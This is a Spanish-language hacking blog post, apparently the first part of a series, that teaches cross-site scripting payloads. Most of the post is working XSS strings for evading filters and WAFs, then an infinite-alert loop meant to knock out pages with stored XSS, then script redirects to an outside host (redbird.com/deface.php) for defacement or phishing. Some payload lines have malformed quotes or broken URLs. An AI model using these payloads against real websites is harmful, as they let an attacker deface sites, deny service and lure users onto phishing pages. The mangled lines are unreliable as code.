Cross Site Scripting | Jugando - Parte 1

Jugando con los Alert()



Ya en otras ocasiones hemos visto la función básica de la vulnerabilidad XSS, desde como se busca, identifica y explota utilizando un sencillo script o payload, con el fin de hacer que el sitio nos muestre una alerta. Para lograr eso, existe infinidad de payloads, que nos permiten vurlar los WAF, los filtros anti-XSS, etc.

Lo que conocemos normalmente es: <script>alert("XSS")</script>.
De este script, nacen mas con el fin de poder burlar filtros, saltarnos etiquetas html, etc. Por ejemplo tenemos estos:

<script>alert("XSS")</script>

"><script>alert('XSS')</script>
'"><script>alert(/XSS/)</script>
"><b><script>alert(/xss/)</script></b>
<img src="x" onerror="alert(1)"">
'"><svg/onload=alert(/XSSPOSED/)>

Y un sin fin mas, de payloads. Sin embargo podemos jugar con los alert, aprovechándonos de la programación javascript y teniendo un poco de imaginacion (xD).

Por ejemplo, podemos utilizar un windows confirm.

<script>function redBIRD() { if (confirm("Selecciona OK")) { alert("RedBirdTeam"); }else { alert("No le diste al OK"); } redBIRD(); } redBIRD(); </script>



Jugando un poco, con una victima o con el XSS. Pero aun podemos ir mas lejos, podemos hacer que los alert, sean "infinitos":

"><script>for (;;) alert("Hacked by.Drok3r")</script>

Defacement & Phishing

Este tipo de script, suele dejar "fuera de servicio" una aplicacion web, que contiene un XSS almacenado, pero gracias a las a nuestros navegadores como lo son Firefox o Chrome, podemos evitar este tipo de ataques.

También podemos llegar a un Defacement con el XSS, sin embargo tiene sus ventajas y desventajas, una de ellas, es que si la vulnerabilidad es reflejada, solo afectara a quien acceda al enlace con el payload, pero si es un xss almacenado, si afecta a cualquiera que acceda a la pagina. Tanto podemos afectar al usuario con un Defacement, podemos redireccionarlo a un phishing del mismo sitio.

Para eso podemos utilizar ya sea que busquemos un defacement o redireccionar a un phishing:

<script> document.location.href = "http://redbird.com/deface.php"; </script>
<script> window.location= "http://
redbird.com/deface.php"; </script> 
<script> location.assign(""http://
redbird.com/deface.php""); </script>
<script> location.replace("http://
redbird.com/deface.php"); </script>

EJEMPLO:

El ejemplo de arriba, redirecciona a una imagen que dice hacked.








INTELMEX
INTELMEX

This is a short biography of the post author. Maecenas nec odio et ante tincidunt tempus donec vitae sapien ut libero venenatis faucibus nullam quis ante maecenas nec odio et ante tincidunt tempus donec.

No hay comentarios.:

Publicar un comentario